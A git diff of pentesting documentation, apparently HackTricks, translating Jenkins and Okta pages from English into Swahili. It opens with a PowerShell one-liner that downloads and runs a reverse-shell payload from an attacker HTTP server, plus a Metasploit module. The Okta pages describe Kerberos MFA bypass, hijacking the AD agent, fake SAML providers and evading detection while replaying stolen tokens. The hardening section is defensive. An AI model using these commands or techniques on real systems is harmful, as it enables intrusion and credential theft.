-### Reverse shell in windows
-
-You can prepare a HTTP server with a PS reverse shell and use Jeking to download and execute it:
-
+Unaweza kuandaa seva ya HTTP yenye PS reverse shell na kutumia Jeking kupakua na kuitekeleza:
```python
scriptblock="iex (New-Object Net.WebClient).DownloadString('http://192.168.252.1:8000/payload')"
echo $scriptblock | iconv --to-code UTF-16LE | base64 -w 0
cmd.exe /c PowerShell.exe -Exec ByPass -Nol -Enc
```
-
### Script
-You can automate this process with [**this script**](https://github.com/gquere/pwn_jenkins/blob/master/rce/jenkins_rce_admin_script.py).
-
-You can use MSF to get a reverse shell:
+Unaweza kuendesha mchakato huu kwa kutumia [**hiki skripti**](https://github.com/gquere/pwn_jenkins/blob/master/rce/jenkins_rce_admin_script.py).
+Unaweza kutumia MSF kupata shell ya kurudi:
```
msf> use exploit/multi/http/jenkins_script_console
```
-
{{#include ../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-ci-cd/okta-security/README.md b/src/pentesting-ci-cd/okta-security/README.md
index e682996c2..0f9f8730e 100644
--- a/src/pentesting-ci-cd/okta-security/README.md
+++ b/src/pentesting-ci-cd/okta-security/README.md
@@ -4,103 +4,103 @@
## Basic Information
-[Okta, Inc.](https://www.okta.com/) is recognized in the identity and access management sector for its cloud-based software solutions. These solutions are designed to streamline and secure user authentication across various modern applications. They cater not only to companies aiming to safeguard their sensitive data but also to developers interested in integrating identity controls into applications, web services, and devices.
+[Okta, Inc.](https://www.okta.com/) inatambuliwa katika sekta ya usimamizi wa utambulisho na ufikiaji kwa ajili ya suluhisho zake za programu za wingu. Suluhisho hizi zimeundwa ili kuboresha na kulinda uthibitishaji wa watumiaji katika programu mbalimbali za kisasa. Zinahudumia si tu kampuni zinazolenga kulinda data zao nyeti bali pia waendelezaji wanaovutiwa na kuunganisha udhibiti wa utambulisho katika programu, huduma za wavuti, na vifaa.
-The flagship offering from Okta is the **Okta Identity Cloud**. This platform encompasses a suite of products, including but not limited to:
+Kutoa kuu kutoka Okta ni **Okta Identity Cloud**. Jukwaa hili linajumuisha seti ya bidhaa, ikiwa ni pamoja na lakini sio tu:
-- **Single Sign-On (SSO)**: Simplifies user access by allowing one set of login credentials across multiple applications.
-- **Multi-Factor Authentication (MFA)**: Enhances security by requiring multiple forms of verification.
-- **Lifecycle Management**: Automates user account creation, update, and deactivation processes.
-- **Universal Directory**: Enables centralized management of users, groups, and devices.
-- **API Access Management**: Secures and manages access to APIs.
+- **Single Sign-On (SSO)**: Inarahisisha ufikiaji wa mtumiaji kwa kuruhusu seti moja ya akisi za kuingia katika programu nyingi.
+- **Multi-Factor Authentication (MFA)**: Inaboresha usalama kwa kuhitaji aina nyingi za uthibitisho.
+- **Lifecycle Management**: Inafanya mchakato wa kuunda, kuboresha, na kufuta akaunti za watumiaji kuwa wa kiotomatiki.
+- **Universal Directory**: Inaruhusu usimamizi wa kati wa watumiaji, vikundi, na vifaa.
+- **API Access Management**: Inalinda na kusimamia ufikiaji wa APIs.
-These services collectively aim to fortify data protection and streamline user access, enhancing both security and convenience. The versatility of Okta's solutions makes them a popular choice across various industries, beneficial to large enterprises, small companies, and individual developers alike. As of the last update in September 2021, Okta is acknowledged as a prominent entity in the Identity and Access Management (IAM) arena.
+Huduma hizi kwa pamoja zinakusudia kuimarisha ulinzi wa data na kuboresha ufikiaji wa watumiaji, ikiongeza usalama na urahisi. Uwezo wa suluhisho za Okta unafanya kuwa chaguo maarufu katika sekta mbalimbali, zikiwa na manufaa kwa makampuni makubwa, kampuni ndogo, na waendelezaji binafsi. Kufikia sasisho la mwisho mnamo Septemba 2021, Okta inatambuliwa kama chombo muhimu katika eneo la Usimamizi wa Utambulisho na Ufikiaji (IAM).
> [!CAUTION]
-> The main gola of Okta is to configure access to different users and groups to external applications. If you manage to **compromise administrator privileges in an Oktas** environment, you will highly probably able to **compromise all the other platforms the company is using**.
+> Lengo kuu la Okta ni kuunda ufikiaji kwa watumiaji na vikundi tofauti kwa programu za nje. Ikiwa utaweza **kudhoofisha haki za msimamizi katika mazingira ya Oktas**, kuna uwezekano mkubwa wa **kudhoofisha majukwaa mengine yote ambayo kampuni inatumia**.
> [!TIP]
-> To perform a security review of an Okta environment you should ask for **administrator read-only access**.
+> Ili kufanya ukaguzi wa usalama wa mazingira ya Okta unapaswa kuomba **ufikiaji wa msimamizi wa kusoma tu**.
### Summary
-There are **users** (which can be **stored in Okta,** logged from configured **Identity Providers** or authenticated via **Active Directory** or LDAP).\
-These users can be inside **groups**.\
-There are also **authenticators**: different options to authenticate like password, and several 2FA like WebAuthn, email, phone, okta verify (they could be enabled or disabled)...
+Kuna **watumiaji** (ambao wanaweza **kuhifadhiwa katika Okta,** kuingia kutoka kwa **Watoa Utambulisho** waliowekwa au kuthibitishwa kupitia **Active Directory** au LDAP).\
+Watumiaji hawa wanaweza kuwa ndani ya **vikundi**.\
+Kuna pia **wauthentikishaji**: chaguzi tofauti za kuthibitisha kama nywila, na 2FA kadhaa kama WebAuthn, barua pepe, simu, okta verify (zinaweza kuwa zimewezeshwa au kuzuiliwa)...
-Then, there are **applications** synchronized with Okta. Each applications will have some **mapping with Okta** to share information (such as email addresses, first names...). Moreover, each application must be inside an **Authentication Policy**, which indicates the **needed authenticators** for a user to **access** the application.
+Kisha, kuna **programu** zilizounganishwa na Okta. Kila programu itakuwa na **ramani fulani na Okta** ili kushiriki habari (kama anwani za barua pepe, majina ya kwanza...). Aidha, kila programu lazima iwe ndani ya **Sera ya Uthibitishaji**, ambayo inaonyesha **wauthentikishaji wanaohitajika** kwa mtumiaji ili **kuingia** kwenye programu.
> [!CAUTION]
-> The most powerful role is **Super Administrator**.
+> Nafasi yenye nguvu zaidi ni **Super Administrator**.
>
-> If an attacker compromise Okta with Administrator access, all the **apps trusting Okta** will be highly probably **compromised**.
+> Ikiwa mshambuliaji atakudhoofisha Okta kwa ufikiaji wa Msimamizi, programu zote **zinazoamini Okta** zitakuwa na uwezekano mkubwa wa **kudhoofishwa**.
## Attacks
### Locating Okta Portal
-Usually the portal of a company will be located in **companyname.okta.com**. If not, try simple **variations** of **companyname.** If you cannot find it, it's also possible that the organization has a **CNAME** record like **`okta.companyname.com`** pointing to the **Okta portal**.
+Kawaida, lango la kampuni litakuwa katika **companyname.okta.com**. Ikiwa sivyo, jaribu **mabadiliko rahisi** ya **companyname.** Ikiwa huwezi kulipata, pia inawezekana kwamba shirika lina rekodi ya **CNAME** kama **`okta.companyname.com`** ikielekeza kwenye **Okta portal**.
### Login in Okta via Kerberos
-If **`companyname.kerberos.okta.com`** is active, **Kerberos is used for Okta access**, typically bypassing **MFA** for **Windows** users. To find Kerberos-authenticated Okta users in AD, run **`getST.py`** with **appropriate parameters**. Upon obtaining an **AD user ticket**, **inject** it into a controlled host using tools like Rubeus or Mimikatz, ensuring **`clientname.kerberos.okta.com` is in the Internet Options "Intranet" zone**. Accessing a specific URL should return a JSON "OK" response, indicating Kerberos ticket acceptance, and granting access to the Okta dashboard.
+Ikiwa **`companyname.kerberos.okta.com`** inafanya kazi, **Kerberos inatumika kwa ufikiaji wa Okta**, kawaida ikiepuka **MFA** kwa watumiaji wa **Windows**. Ili kupata watumiaji wa Okta walioidhinishwa na Kerberos katika AD, endesha **`getST.py`** na **parameta zinazofaa**. Baada ya kupata **tiketi ya mtumiaji wa AD**, **ingiza** kwenye mwenyeji aliye na udhibiti kwa kutumia zana kama Rubeus au Mimikatz, kuhakikisha **`clientname.kerberos.okta.com` iko katika eneo la "Intranet" la Chaguzi za Mtandao**. Kufikia URL maalum kunapaswa kurudisha jibu la JSON "OK", ikionyesha kukubaliwa kwa tiketi ya Kerberos, na kutoa ufikiaji wa dashibodi ya Okta.
-Compromising the **Okta service account with the delegation SPN enables a Silver Ticket attack.** However, Okta's use of **AES** for ticket encryption requires possessing the AES key or plaintext password. Use **`ticketer.py` to generate a ticket for the victim user** and deliver it via the browser to authenticate with Okta.
+Kudhoofisha **akaunti ya huduma ya Okta na SPN ya uwakilishi inaruhusu shambulio la Silver Ticket.** Hata hivyo, matumizi ya Okta ya **AES** kwa ajili ya usimbaji wa tiketi yanahitaji kuwa na ufunguo wa AES au nywila ya wazi. Tumia **`ticketer.py` kutengeneza tiketi kwa mtumiaji wa mwathirika** na kuisambaza kupitia kivinjari ili kuthibitisha na Okta.
-**Check the attack in** [**https://trustedsec.com/blog/okta-for-red-teamers**](https://trustedsec.com/blog/okta-for-red-teamers)**.**
+**Angalia shambulio katika** [**https://trustedsec.com/blog/okta-for-red-teamers**](https://trustedsec.com/blog/okta-for-red-teamers)**.**
### Hijacking Okta AD Agent
-This technique involves **accessing the Okta AD Agent on a server**, which **syncs users and handles authentication**. By examining and decrypting configurations in **`OktaAgentService.exe.config`**, notably the AgentToken using **DPAPI**, an attacker can potentially **intercept and manipulate authentication data**. This allows not only **monitoring** and **capturing user credentials** in plaintext during the Okta authentication process but also **responding to authentication attempts**, thereby enabling unauthorized access or providing universal authentication through Okta (akin to a 'skeleton key').
+Teknolojia hii inahusisha **kupata Okta AD Agent kwenye seva**, ambayo **inasawazisha watumiaji na kushughulikia uthibitishaji**. Kwa kuchunguza na kufichua mipangilio katika **`OktaAgentService.exe.config`**, hasa AgentToken kwa kutumia **DPAPI**, mshambuliaji anaweza kwa urahisi **kukamata na kubadilisha data za uthibitishaji**. Hii inaruhusu si tu **kuangalia** na **kukamata akisi za mtumiaji** kwa wazi wakati wa mchakato wa uthibitishaji wa Okta bali pia **kujibu majaribio ya uthibitishaji**, hivyo kuruhusu ufikiaji usioidhinishwa au kutoa uthibitishaji wa ulimwengu wote kupitia Okta (kama funguo ya 'skeleton').
-**Check the attack in** [**https://trustedsec.com/blog/okta-for-red-teamers**](https://trustedsec.com/blog/okta-for-red-teamers)**.**
+**Angalia shambulio katika** [**https://trustedsec.com/blog/okta-for-red-teamers**](https://trustedsec.com/blog/okta-for-red-teamers)**.**
### Hijacking AD As an Admin
-This technique involves hijacking an Okta AD Agent by first obtaining an OAuth Code, then requesting an API token. The token is associated with an AD domain, and a **connector is named to establish a fake AD agent**. Initialization allows the agent to **process authentication attempts**, capturing credentials via the Okta API. Automation tools are available to streamline this process, offering a seamless method to intercept and handle authentication data within the Okta environment.
+Teknolojia hii inahusisha kudhibiti Okta AD Agent kwa kwanza kupata OAuth Code, kisha kuomba token ya API. Token hiyo inahusishwa na eneo la AD, na **kiunganishi kinaitwa kuanzisha wakala wa AD wa uwongo**. Kuanzisha kunaruhusu wakala **kushughulikia majaribio ya uthibitishaji**, kukamata akisi kupitia API ya Okta. Zana za kiotomatiki zinapatikana ili kurahisisha mchakato huu, zikitoa njia rahisi ya kukamata na kushughulikia data za uthibitishaji ndani ya mazingira ya Okta.
-**Check the attack in** [**https://trustedsec.com/blog/okta-for-red-teamers**](https://trustedsec.com/blog/okta-for-red-teamers)**.**
+**Angalia shambulio katika** [**https://trustedsec.com/blog/okta-for-red-teamers**](https://trustedsec.com/blog/okta-for-red-teamers)**.**
### Okta Fake SAML Provider
-**Check the attack in** [**https://trustedsec.com/blog/okta-for-red-teamers**](https://trustedsec.com/blog/okta-for-red-teamers)**.**
+**Angalia shambulio katika** [**https://trustedsec.com/blog/okta-for-red-teamers**](https://trustedsec.com/blog/okta-for-red-teamers)**.**
-The technique involves **deploying a fake SAML provider**. By integrating an external Identity Provider (IdP) within Okta's framework using a privileged account, attackers can **control the IdP, approving any authentication request at will**. The process entails setting up a SAML 2.0 IdP in Okta, manipulating the IdP Single Sign-On URL for redirection via local hosts file, generating a self-signed certificate, and configuring Okta settings to match against the username or email. Successfully executing these steps allows for authentication as any Okta user, bypassing the need for individual user credentials, significantly elevating access control in a potentially unnoticed manner.
+Teknolojia hii inahusisha **kuanzisha mtoa huduma wa SAML wa uwongo**. Kwa kuunganisha Mtoa Utambulisho wa nje (IdP) ndani ya mfumo wa Okta kwa kutumia akaunti yenye mamlaka, washambuliaji wanaweza **kudhibiti IdP, wakikubali ombi lolote la uthibitishaji kwa mapenzi yao**. Mchakato huu unajumuisha kuanzisha IdP ya SAML 2.0 katika Okta, kubadilisha URL ya SSO ya IdP kwa ajili ya kuelekeza kupitia faili ya wenyeji wa ndani, kutengeneza cheti kilichojisajili, na kuunda mipangilio ya Okta ili kulinganisha na jina la mtumiaji au barua pepe. Kutekeleza hatua hizi kwa mafanikio kunaruhusu uthibitishaji kama mtumiaji yeyote wa Okta, bila kuhitaji akisi za mtumiaji binafsi, na kuongeza udhibiti wa ufikiaji kwa njia ambayo inaweza kutokewa.
### Phishing Okta Portal with Evilgnix
-In [**this blog post**](https://medium.com/nickvangilder/okta-for-red-teamers-perimeter-edition-c60cb8d53f23) is explained how to prepare a phishing campaign against an Okta portal.
+Katika [**hiki kipande cha blogi**](https://medium.com/nickvangilder/okta-for-red-teamers-perimeter-edition-c60cb8d53f23) inaelezwa jinsi ya kuandaa kampeni ya phishing dhidi ya lango la Okta.
### Colleague Impersonation Attack
-The **attributes that each user can have and modify** (like email or first name) can be configured in Okta. If an **application** is **trusting** as ID an **attribute** that the user can **modify**, he will be able to **impersonate other users in that platform**.
+**Sifa ambazo kila mtumiaji anaweza kuwa nazo na kubadilisha** (kama barua pepe au jina la kwanza) zinaweza kuundwa katika Okta. Ikiwa **programu** inakubali kama ID **sifa** ambayo mtumiaji anaweza **kubadilisha**, ataweza **kujifanya kuwa watumiaji wengine katika jukwaa hilo**.
-Therefore, if the app is trusting the field **`userName`**, you probably won't be able to change it (because you usually cannot change that field), but if it's trusting for example **`primaryEmail`** you might be able to **change it to a colleagues email address** and impersonate it (you will need to have access to the email and accept the change).
+Hivyo basi, ikiwa programu inakubali uwanja wa **`userName`**, huenda usiweze kuubadilisha (kwa sababu huwezi kubadilisha uwanja huo), lakini ikiwa inakubali kwa mfano **`primaryEmail`** unaweza kuwa na uwezo wa **kuubadilisha kuwa anwani ya barua pepe ya mwenzako** na kujifanya (utahitaji kuwa na ufikiaji wa barua pepe na kukubali mabadiliko).
-Note that this impersoantion depends on how each application was condigured. Only the ones trusting the field you modified and accepting updates will be compromised.\
-Therefore, the app should have this field enabled if it exists:
+Kumbuka kwamba hii kujifanya inategemea jinsi kila programu ilivyoundwa. Ni zile tu zinazokubali uwanja uliohubadilishwa na kukubali masasisho zitakazodhuriwa.\
+Hivyo basi, programu inapaswa kuwa na uwanja huu umewezeshwa ikiwa upo:
-I have also seen other apps that were vulnerable but didn't have that field in the Okta settings (at the end different apps are configured differently).
+Nimeona pia programu nyingine ambazo zilikuwa na udhaifu lakini hazikuwa na uwanja huo katika mipangilio ya Okta (mwishowe programu tofauti zimeundwa tofauti).
-The best way to find out if you could impersonate anyone on each app would be to try it!
+Njia bora ya kujua ikiwa unaweza kujifanya kuwa mtu yeyote kwenye kila programu itakuwa kujaribu!
## Evading behavioural detection policies
-Behavioral detection policies in Okta might be unknown until encountered, but **bypassing** them can be achieved by **targeting Okta applications directly**, avoiding the main Okta dashboard. With an **Okta access token**, replay the token at the **application-specific Okta URL** instead of the main login page.
+Sera za kugundua tabia katika Okta zinaweza kuwa hazijulikani hadi zipatikane, lakini **kuzipita** kunaweza kufanywa kwa **kulenga programu za Okta moja kwa moja**, kuepuka dashibodi kuu ya Okta. Kwa kutumia **token ya ufikiaji wa Okta**, rudia token hiyo kwenye **URL maalum ya Okta ya programu** badala ya ukurasa kuu wa kuingia.
-Key recommendations include:
+Mapendekezo muhimu ni pamoja na:
-- **Avoid using** popular anonymizer proxies and VPN services when replaying captured access tokens.
-- Ensure **consistent user-agent strings** between the client and replayed access tokens.
-- **Refrain from replaying** tokens from different users from the same IP address.
-- Exercise caution when replaying tokens against the Okta dashboard.
-- If aware of the victim company's IP addresses, **restrict traffic** to those IPs or their range, blocking all other traffic.
+- **Epuka kutumia** proxies maarufu za anonymizer na huduma za VPN unapofanya kurudiwa kwa token za ufikiaji zilizokamatwa.
+- Hakikisha **nyuzi za mtumiaji zinazofanana** kati ya mteja na token za ufikiaji zilizorejeshwa.
+- **Epuka kurudi token** kutoka kwa watumiaji tofauti kutoka anwani moja ya IP.
+- Fanya makini unapofanya kurudi token dhidi ya dashibodi ya Okta.
+- Ikiwa unajua anwani za IP za kampuni ya mwathirika, **punguza trafiki** kwa hizo IP au anuwai yao, ukizuia trafiki nyingine zote.
## Okta Hardening
-Okta has a lot of possible configurations, in this page you will find how to review them so they are as secure as possible:
+Okta ina mipangilio mingi inayowezekana, katika ukurasa huu utapata jinsi ya kuzikagua ili ziwe salama kadri inavyowezekana:
{{#ref}}
okta-hardening.md
@@ -112,7 +112,3 @@ okta-hardening.md
- [https://medium.com/nickvangilder/okta-for-red-teamers-perimeter-edition-c60cb8d53f23](https://medium.com/nickvangilder/okta-for-red-teamers-perimeter-edition-c60cb8d53f23)
{{#include ../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-ci-cd/okta-security/okta-hardening.md b/src/pentesting-ci-cd/okta-security/okta-hardening.md
index a7dac96a7..e97f7d5d2 100644
--- a/src/pentesting-ci-cd/okta-security/okta-hardening.md
+++ b/src/pentesting-ci-cd/okta-security/okta-hardening.md
@@ -6,72 +6,72 @@
### People
-From an attackers perspective, this is super interesting as you will be able to see **all the users registered**, their **email** addresses, the **groups** they are part of, **profiles** and even **devices** (mobiles along with their OSs).
+Kutoka kwa mtazamo wa washambuliaji, hii ni ya kuvutia sana kwani utaweza kuona **watumiaji wote waliojiandikisha**, anwani zao za **barua pepe**, **makundi** wanayoshiriki, **profaili** na hata **vifaa** (simu za mkononi pamoja na mifumo yao ya uendeshaji).
-For a whitebox review check that there aren't several "**Pending user action**" and "**Password reset**".
+Kwa ukaguzi wa whitebox hakikisha kuwa hakuna "**Hatua ya mtumiaji inayosubiri**" na "**Kurekebisha nenosiri**".
### Groups
-This is where you find all the created groups in Okta. it's interesting to understand the different groups (set of **permissions**) that could be granted to **users**.\
-It's possible to see the **people included inside groups** and **apps assigned** to each group.
+Hapa ndipo unapata makundi yote yaliyoanzishwa katika Okta. Ni ya kuvutia kuelewa makundi tofauti (seti ya **idhini**) ambayo yanaweza kutolewa kwa **watumiaji**.\
+Inawezekana kuona **watu walio ndani ya makundi** na **programu zilizotengwa** kwa kila kundi.
-Ofc, any group with the name of **admin** is interesting, specially the group **Global Administrators,** check the members to learn who are the most privileged members.
+Kwa kweli, kundi lolote lenye jina la **admin** ni la kuvutia, hasa kundi la **Wasimamizi wa Kimataifa,** angalia wanachama kujua ni nani wanachama wenye mamlaka zaidi.
-From a whitebox review, there **shouldn't be more than 5 global admins** (better if there are only 2 or 3).
+Kutoka kwa ukaguzi wa whitebox, **hakupaswi kuwa na wasimamizi wa kimataifa zaidi ya 5** (ni bora ikiwa kuna 2 au 3 tu).
### Devices
-Find here a **list of all the devices** of all the users. You can also see if it's being **actively managed** or not.
+Pata hapa **orodha ya vifaa vyote** vya watumiaji wote. Unaweza pia kuona ikiwa inasimamiwa **kwa ufanisi** au la.
### Profile Editor
-Here is possible to observe how key information such as first names, last names, emails, usernames... are shared between Okta and other applications. This is interesting because if a user can **modify in Okta a field** (such as his name or email) that then is used by an **external application** to **identify** the user, an insider could try to **take over other accounts**.
+Hapa inawezekana kuona jinsi taarifa muhimu kama vile majina ya kwanza, majina ya mwisho, barua pepe, majina ya mtumiaji... zinavyoshirikiwa kati ya Okta na programu nyingine. Hii ni ya kuvutia kwa sababu ikiwa mtumiaji anaweza **kubadilisha katika Okta uwanja** (kama jina lake au barua pepe) ambayo kisha inatumika na **programu ya nje** ili **kutambua** mtumiaji, mtu wa ndani anaweza kujaribu **kuchukua akaunti nyingine**.
-Moreover, in the profile **`User (default)`** from Okta you can see **which fields** each **user** has and which ones are **writable** by users. If you cannot see the admin panel, just go to **update your profile** information and you will see which fields you can update (note that to update an email address you will need to verify it).
+Zaidi ya hayo, katika profaili **`User (default)`** kutoka Okta unaweza kuona **ni viwanja gani** kila **mtumiaji** ana na ni vipi **vinavyoweza kuandikwa** na watumiaji. Ikiwa huwezi kuona paneli ya admin, nenda tu **sasisha taarifa za profaili yako** na utaona ni viwanja gani unaweza kusasisha (kumbuka kuwa ili kusasisha anwani ya barua pepe utahitaji kuithibitisha).
### Directory Integrations
-Directories allow you to import people from existing sources. I guess here you will see the users imported from other directories.
+Maktaba zinakuwezesha kuingiza watu kutoka vyanzo vilivyopo. Nadhani hapa utaona watumiaji waliingizwa kutoka maktaba nyingine.
-I haven't seen it, but I guess this is interesting to find out **other directories that Okta is using to import users** so if you **compromise that directory** you could set some attributes values in the users created in Okta and **maybe compromise the Okta env**.
+Sijawahi kuona, lakini nadhani hii ni ya kuvutia kugundua **maktaba nyingine ambazo Okta inatumia kuingiza watumiaji** ili ikiwa **utavunja maktaba hiyo** unaweza kuweka baadhi ya thamani za sifa katika watumiaji walioundwa katika Okta na **labda kuathiri mazingira ya Okta**.
### Profile Sources
-A profile source is an **application that acts as a source of truth** for user profile attributes. A user can only be sourced by a single application or directory at a time.
+Chanzo cha profaili ni **programu inayofanya kazi kama chanzo cha ukweli** kwa sifa za profaili za mtumiaji. Mtumiaji anaweza tu kutolewa na programu au maktaba moja kwa wakati mmoja.
-I haven't seen it, so any information about security and hacking regarding this option is appreciated.
+Sijawahi kuona, hivyo taarifa yoyote kuhusu usalama na uhalifu kuhusu chaguo hili inathaminiwa.
## Customizations
### Brands
-Check in the **Domains** tab of this section the email addresses used to send emails and the custom domain inside Okta of the company (which you probably already know).
+Angalia katika tab ya **Domains** ya sehemu hii anwani za barua pepe zinazotumika kutuma barua pepe na jina la kikoa maalum ndani ya Okta la kampuni (ambalo huenda tayari unalijua).
-Moreover, in the **Setting** tab, if you are admin, you can "**Use a custom sign-out page**" and set a custom URL.
+Zaidi ya hayo, katika tab ya **Setting**, ikiwa wewe ni admin, unaweza "**Tumia ukurasa maalum wa kutoka**" na kuweka URL maalum.
### SMS
-Nothing interesting here.
+Hakuna kitu cha kuvutia hapa.
### End-User Dashboard
-You can find here applications configured, but we will see the details of those later in a different section.
+Unaweza kupata hapa programu zilizowekwa, lakini tutaona maelezo ya hizo baadaye katika sehemu tofauti.
### Other
-Interesting setting, but nothing super interesting from a security point of view.
+Mipangilio ya kuvutia, lakini hakuna kitu cha kuvutia sana kutoka kwa mtazamo wa usalama.
## Applications
### Applications
-Here you can find all the **configured applications** and their details: Who has access to them, how is it configured (SAML, OPenID), URL to login, the mappings between Okta and the application...
+Hapa unaweza kupata **programu zote zilizowekwa** na maelezo yao: Nani ana ufikiaji wa hizo, jinsi ilivyowekwa (SAML, OPenID), URL ya kuingia, ramani kati ya Okta na programu...
-In the **`Sign On`** tab there is also a field called **`Password reveal`** that would allow a user to **reveal his password** when checking the application settings. To check the settings of an application from the User Panel, click the 3 dots:
+Katika tab ya **`Sign On`** pia kuna uwanja unaoitwa **`Password reveal`** ambao utamruhusu mtumiaji **kuonyesha nenosiri lake** wakati wa kuangalia mipangilio ya programu. Ili kuangalia mipangilio ya programu kutoka kwa Paneli ya Mtumiaji, bonyeza alama 3:
-And you could see some more details about the app (like the password reveal feature, if it's enabled):
+Na unaweza kuona maelezo zaidi kuhusu programu (kama kipengele cha kuonyesha nenosiri, ikiwa kimewezeshwa):
@@ -79,125 +79,121 @@ And you could see some more details about the app (like the password reveal feat
### Access Certifications
-Use Access Certifications to create audit campaigns to review your users' access to resources periodically and approve or revoke access automatically when required.
+Tumia Access Certifications kuunda kampeni za ukaguzi ili kupitia ufikiaji wa watumiaji wako kwa rasilimali mara kwa mara na kuidhinisha au kufuta ufikiaji kiotomatiki inapohitajika.
-I haven't seen it used, but I guess that from a defensive point of view it's a nice feature.
+Sijawahi kuona ikitumika, lakini nadhani kutoka kwa mtazamo wa kujihami ni kipengele kizuri.
## Security
### General
-- **Security notification emails**: All should be enabled.
-- **CAPTCHA integration**: It's recommended to set at least the invisible reCaptcha
-- **Organization Security**: Everything can be enabled and activation emails shouldn't last long (7 days is ok)
-- **User enumeration prevention**: Both should be enabled
- - Note that User Enumeration Prevention doesn't take effect if either of the following conditions are allowed (See [User management](https://help.okta.com/oie/en-us/Content/Topics/users-groups-profiles/usgp-main.htm) for more information):
- - Self-Service Registration
- - JIT flows with email authentication
-- **Okta ThreatInsight settings**: Log and enforce security based on threat level
+- **Barua pepe za arifa za usalama**: Zote zinapaswa kuwezeshwa.
+- **Ushirikiano wa CAPTCHA**: Inapendekezwa kuweka angalau reCaptcha isiyoonekana
+- **Usalama wa Shirika**: Kila kitu kinaweza kuwezeshwa na barua pepe za uanzishaji hazipaswi kudumu kwa muda mrefu (siku 7 ni sawa)
+- **Kuzuia kuhesabu watumiaji**: Zote zinapaswa kuwezeshwa
+- Kumbuka kuwa Kuzuia Kuangalia Watumiaji hakutatumika ikiwa mojawapo ya masharti yafuatayo yanaruhusiwa (Tazama [Usimamizi wa watumiaji](https://help.okta.com/oie/en-us/Content/Topics/users-groups-profiles/usgp-main.htm) kwa maelezo zaidi):
+- Usajili wa Huduma ya Kibinafsi
+- Mchakato wa JIT na uthibitisho wa barua pepe
+- **Mipangilio ya Okta ThreatInsight**: Rekodi na enforce usalama kulingana na kiwango cha tishio
### HealthInsight
-Here is possible to find correctly and **dangerous** configured **settings**.
+Hapa inawezekana kupata mipangilio **iliyowekwa** kwa usahihi na **hatari**.
### Authenticators
-Here you can find all the authentication methods that a user could use: Password, phone, email, code, WebAuthn... Clicking in the Password authenticator you can see the **password policy**. Check that it's strong.
+Hapa unaweza kupata njia zote za uthibitishaji ambazo mtumiaji anaweza kutumia: Nenosiri, simu, barua pepe, nambari, WebAuthn... Bonyeza kwenye uthibitishaji wa Nenosiri unaweza kuona **sera ya nenosiri**. Hakikisha kuwa ni imara.
-In the **Enrollment** tab you can see how the ones that are required or optinal:
+Katika tab ya **Enrollment** unaweza kuona jinsi zile zinazohitajika au za hiari:
-It's recommendatble to disable Phone. The strongest ones are probably a combination of password, email and WebAuthn.
+Inapendekezwa kuzima Simu. Njia zenye nguvu zaidi ni pengine mchanganyiko wa nenosiri, barua pepe na WebAuthn.
### Authentication policies
-Every app has an authentication policy. The authentication policy verifies that users who try to sign in to the app meet specific conditions, and it enforces factor requirements based on those conditions.
+Kila programu ina sera ya uthibitishaji. Sera ya uthibitishaji inathibitisha kuwa watumiaji wanaojaribu kuingia kwenye programu wanakidhi masharti maalum, na inatekeleza mahitaji ya vipengele kulingana na masharti hayo.
-Here you can find the **requirements to access each application**. It's recommended to request at least password and another method for each application. But if as attacker you find something more weak you might be able to attack it.
+Hapa unaweza kupata **mahitaji ya kufikia kila programu**. Inapendekezwa kutaka angalau nenosiri na njia nyingine kwa kila programu. Lakini ikiwa kama mshambuliaji unapata kitu chochote dhaifu unaweza kuwa na uwezo wa kukishambulia.
### Global Session Policy
-Here you can find the session policies assigned to different groups. For example:
+Hapa unaweza kupata sera za kikao zilizotengwa kwa makundi tofauti. Kwa mfano:
-It's recommended to request MFA, limit the session lifetime to some hours, don't persis session cookies across browser extensions and limit the location and Identity Provider (if this is possible). For example, if every user should be login from a country you could only allow this location.
+Inapendekezwa kutaka MFA, kupunguza muda wa kikao kuwa masaa kadhaa, usihifadhi kuki za kikao kupitia nyongeza za kivinjari na kupunguza eneo na Mtoa Kitambulisho (ikiwa hii inawezekana). Kwa mfano, ikiwa kila mtumiaji anapaswa kuingia kutoka nchi fulani unaweza kuruhusu tu eneo hili.
### Identity Providers
-Identity Providers (IdPs) are services that **manage user accounts**. Adding IdPs in Okta enables your end users to **self-register** with your custom applications by first authenticating with a social account or a smart card.
+Watoa Kitambulisho (IdPs) ni huduma ambazo **zinatawala akaunti za watumiaji**. Kuongeza IdPs katika Okta kunawawezesha watumiaji wako wa mwisho **kujiandikisha wenyewe** na programu zako maalum kwa kuanza kuthibitisha na akaunti ya kijamii au kadi ya smart.
-On the Identity Providers page, you can add social logins (IdPs) and configure Okta as a service provider (SP) by adding inbound SAML. After you've added IdPs, you can set up routing rules to direct users to an IdP based on context, such as the user's location, device, or email domain.
+Katika ukurasa wa Watoa Kitambulisho, unaweza kuongeza kuingia kwa kijamii (IdPs) na kuunda Okta kama mtoa huduma (SP) kwa kuongeza SAML ya ndani. Baada ya kuongeza IdPs, unaweza kuunda sheria za kuelekeza watumiaji kwa IdP kulingana na muktadha, kama vile eneo la mtumiaji, kifaa, au kikoa cha barua pepe.
-**If any identity provider is configured** from an attackers and defender point of view check that configuration and **if the source is really trustable** as an attacker compromising it could also get access to the Okta environment.
+**Ikiwa mtoa kitambulisho yeyote amewekwa** kutoka kwa mtazamo wa washambuliaji na walinzi angalia mipangilio hiyo na **ikiwa chanzo ni cha kuaminika kweli** kwani mshambuliaji anayevunja inaweza pia kupata ufikiaji wa mazingira ya Okta.
### Delegated Authentication
-Delegated authentication allows users to sign in to Okta by entering credentials for their organization's **Active Directory (AD) or LDAP** server.
+Uthibitishaji wa wakala unaruhusu watumiaji kuingia katika Okta kwa kuingiza taarifa za kuingia za **Active Directory (AD) au LDAP** ya shirika lao.
-Again, recheck this, as an attacker compromising an organizations AD could be able to pivot to Okta thanks to this setting.
+Tena, angalia hii, kwani mshambuliaji anayevunja AD ya shirika anaweza kuwa na uwezo wa kuhamasisha Okta kutokana na mipangilio hii.
### Network
-A network zone is a configurable boundary that you can use to **grant or restrict access to computers and devices** in your organization based on the **IP address** that is requesting access. You can define a network zone by specifying one or more individual IP addresses, ranges of IP addresses, or geographic locations.
+Eneo la mtandao ni mpaka unaoweza kubadilishwa ambao unaweza kutumia ili **kutoa au kupunguza ufikiaji wa kompyuta na vifaa** katika shirika lako kulingana na **anwani ya IP** inayotafuta ufikiaji. Unaweza kufafanua eneo la mtandao kwa kubainisha moja au zaidi ya anwani za IP, anuwai za anwani za IP, au maeneo ya kijiografia.
